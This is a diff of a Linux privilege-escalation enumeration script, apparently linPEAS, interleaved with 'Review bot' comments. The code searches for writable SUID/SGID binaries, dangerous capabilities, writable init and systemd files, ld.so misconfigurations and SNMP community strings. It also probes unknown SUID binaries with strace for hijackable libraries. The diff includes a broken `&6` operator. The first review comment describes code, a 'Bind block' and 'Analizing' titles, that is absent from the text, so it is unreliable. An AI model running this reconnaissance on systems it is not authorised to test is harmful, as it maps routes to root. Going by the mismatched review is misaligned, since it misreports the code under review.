printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; + - #-- SI) SNMP params - printf $Y"[+] "$GREEN"SNMPs\n"$NC - snmpdfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'snmpd.conf') - printf "%s\n" "$snmpdfiles" | while read f; do - ls -l "$f" 2>/dev/null - cat "$f" 2>/dev/null | grep -E "rocommunity|rwcommunity" | sed -${E} "s,rocommunity|rwcommunity,${C}[1;31m&${C}[0m," - echo "" - done - echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi @@ -2788,11 +2713,11 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ########################################### #----------) Interesting files (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Interesting Files"$B" ╠════════════════════════════════════\n"$NC + print_title "Interesting Files" ##-- IF) SUID - printf $Y"[+] "$GREEN"SUID - Check easy privesc, exploits and write perms\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + print_2title "SUID - Check easy privesc, exploits and write perms" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" if ! [ "$STRINGS" ]; then echo_not_found "strings" fi 
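Review bot: In the new Bind block, the inner loop over every file under `$f` pipes `ls -ld "$ff"` through `sed -${E} "s,,${SED_RED},"` with an empty regex; a freshly started sed has no previous expression to fall back on, so it exits with an error and the listing for those files is lost. Either drop the sed on that line (`ls -ld "$ff"`) or give it a real pattern, as the `*.key` loop right after it does. The same generated blocks spell every section title `Analizing` and produce doubled words in `Analizing Windows Files Files` and `Analizing Other Interesting Files Files`; the template that emits these `print_2title` lines should read `Analyzing` and not append `Files` to a name that already ends with it. Separately, `for ff in $(find "$f" ...)` word-splits paths containing whitespace, whereas the surrounding code uses `| while read f`; using the same form for the inner loops would keep behavior consistent. The enclosing `if [ "`echo $CHECKS | grep SofI`" ]` block starts outside this hunk.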
@@ -2802,14 +2727,14 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if [ "`echo \"$s\" | grep -E \"^total\"`" ]; then break; fi - + sname="`echo \"$s\" | awk '{print $9}'`" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing - elif [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do 
@@ -2821,9 +2746,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then done; if [ "$c" ]; then if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then - echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG3,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG4,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$sidVB2,${C}[1;31;103m&${C}[0m," + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m," + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do @@ -2844,7 +2769,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $ITALIC echo "----------------------------------------------------------------------------------------" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC echo "----------------------------------------------------------------------------------------" echo "" 
@@ -2858,8 +2783,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) SGID - printf $Y"[+] "$GREEN"SGID\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + print_2title "SGID" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if [ "`echo \"$s\" | grep -E \"^total\"`" ];then break; fi @@ -2867,10 +2792,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then sname="`echo \"$s\" | awk '{print $9}'`" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing - elif [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] &6 [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do 
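Review bot: The writable-SGID branch has a typo: `elif ! [ "$IAMROOT" ] &6 [ -w "$sname" ]; then` uses `&6` where `&&` is intended, so the shell backgrounds the `! [ "$IAMROOT" ]` test and then tries to run a command named `6`, which fails. As a result the branch can never be taken, writable SGID binaries are silently not reported, and a stray background job is spawned for every file the loop visits. It should read `elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then`, matching the corresponding SUID line in the earlier hunk. The enclosing `while read s` loop continues past the end of this hunk.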
@@ -2882,9 +2807,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then done; if [ "$c" ]; then if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then - echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG3,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG4,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$sidVB2,${C}[1;31;103m&${C}[0m," + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m," + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" | sort | uniq | while read sline; do @@ -2904,7 +2829,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then printf $ITALIC echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC echo "" fi 
@@ -2916,196 +2841,196 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Misconfigured ld.so - printf $Y"[+] "$GREEN"Checking misconfigurations of ld.so\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so\n"$NC + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" cat /etc/ld.so.conf 2>/dev/null | while read l; do if [ "`echo \"$l\" | grep include`" ]; then ini_path="`echo \"$l\" | cut -d " " -f 2`" fpath="`dirname \"$ini_path\"`" - if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed 
-${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done fi done echo "" ##-- IF) Capabilities - printf $Y"[+] "$GREEN"Capabilities\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${C}[1;31;103m&${C}[0m," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$$/status" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" echo "Shell capabilities:" (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$PPID/status" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" echo "Files with capabilities (limited to 50):" getcap -r / 2>/dev/null | head -n 50 | while read cb; do - echo "$cb" | sed -${E} "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m," - if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "$cb" | sed -${E} "s,$sudocapsB,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED}," + if ! 
[ "$IAMROOT" ] && [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," fi done echo "" ##-- IF) Users with capabilities - printf $Y"[+] "$GREEN"Users with capabilities\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," else echo_not_found "/etc/security/capability.conf" fi echo "" ##-- IF) Files with ACLs - printf $Y"[+] "$GREEN"Files with ACLs (limited to 50)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls\n"$NC - ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + print_2title "Files with ACLs (limited to 50)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" + ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," echo "" - + ##-- IF) .sh 
files in PATH - printf $Y"[+] "$GREEN".sh files in path\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path\n"$NC - echo $PATH | tr ":" "\n" | while read d; do + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" + echo $PATH | tr ":" "\n" | while read d; do for f in `find "$d" -name "*.sh" 2>/dev/null`; do - if [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else - echo $f | sed -${E} "s,$shscripsG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,"; + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; fi done done echo "" ##-- IF) Unexpected folders in / - printf $Y"[+] "$GREEN"Unexpected in root\n"$NC + print_2title "Unexpected in root" if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found fi echo "" ##-- IF) Files (scripts) in /etc/profile.d/ - printf $Y"[+] "$GREEN"Files (scripts) in /etc/profile.d/\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC + 
print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" - if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" ##-- IF) Files (scripts) in /etc/init.d/ - printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC + print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d/init.d -type f 
'(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /lib/systemd/ -type f 
'(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
